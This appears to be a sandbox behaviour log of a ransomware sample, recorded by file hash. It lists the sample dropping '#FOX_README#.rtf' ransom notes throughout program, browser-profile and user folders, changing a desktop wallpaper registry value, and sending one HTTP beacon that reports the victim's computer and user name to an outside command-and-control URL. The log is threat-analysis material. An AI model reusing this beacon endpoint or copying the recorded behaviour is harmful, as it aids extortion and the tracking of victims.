Cache\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}v14.21.27702\packages\vcRuntimeMinimum_amd64\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\YAUNGDT1\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\Favorites\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\bin\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\AppData\Roaming\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Public\Desktop\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\Pictures\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Javascripts\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_BR\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\lua\playlist\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\en_GB\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\ast\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\mk\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_CN\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\Z1YRRYOY\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.update\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Mozilla Firefox\fonts\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\pl\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\locale\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\AppData\Local\Adobe\Acrobat\9.0\Cache\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Mozilla Firefox\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\nl\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\pa\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\f5hc8vjc.default-release\cache2\entries\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Crash Reports\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\am\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Microsoft.NET\RedistList\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\dropins\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jre7\lib\cmm\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\ProgramData\Microsoft Help\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Public\Downloads\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\db\bin\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\skins\fonts\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\PMP\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jre7\lib\zi\America\Indiana\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\el\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\ProgramData\Microsoft\OfficeSoftwareProtectionPlatform\Cache\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\bin\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\etc\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Local Storage\leveldb\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\hr\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Session Storage\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\include\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jre7\lib\zi\Antarctica\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\bs\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Code Cache\wasm\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\Searches\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\Contacts\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jre7\lib\deploy\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\wa\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Control Panel\Desktop\TileWallpaper = "0" reg.exe File created C:\Program Files\VideoLAN\VLC\locale\fy\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe HTTP URL 6 http://fredstat.000webhostapp.com/addrecord.php?apikey=fox_api_key&compuser=UCQFZDUI|Admin&sid=rhCRvpynnHrrWMnj&phase=[ALL]2BD8F144E79A3AE0 Process not Found File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\sv\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\lua\http\js\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Mozilla Maintenance Service\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\an\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\tr\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\META-INF\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\lua\extensions\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jre7\lib\zi\America\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\ProgramData\Mozilla\updates\308046B0AF4A39CB\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Google\Update\Install\{24604DAC-26A2-4023-B42D-9AEA602FC027}\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Protect\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Public\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\ProgramData\Adobe\Updater6\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\ProgramData\Microsoft\Crypto\RSA\S-1-5-18\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f5hc8vjc.default-release\datareporting\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Public\Videos\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\bn\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-2090973689-680783404-4292415065-1000\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\default_apps\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\zu\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\Documents\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\ga\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\or\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Public\Music\Sample Music\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jre7\lib\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\br\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\Desktop\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\skins\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Document Building Blocks\1033\14\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\lua\meta\reader\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Code Cache\wasm\index-dir\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jre7\lib\zi\America\Argentina\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Google\Chrome\Application\SetupMetrics\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Public\Recorded TV\Sample Media\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Microsoft Sync Framework\v1.0\Runtime\x64\resources\1033\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\ProgramData\Package Cache\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}v12.0.40660\packages\vcRuntimeAdditional_amd64\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\ms\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\Favorites\Links\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jre7\lib\zi\America\North_Dakota\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Mozilla Firefox\browser\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\db\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\sl\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\#FOX_README#.rtf 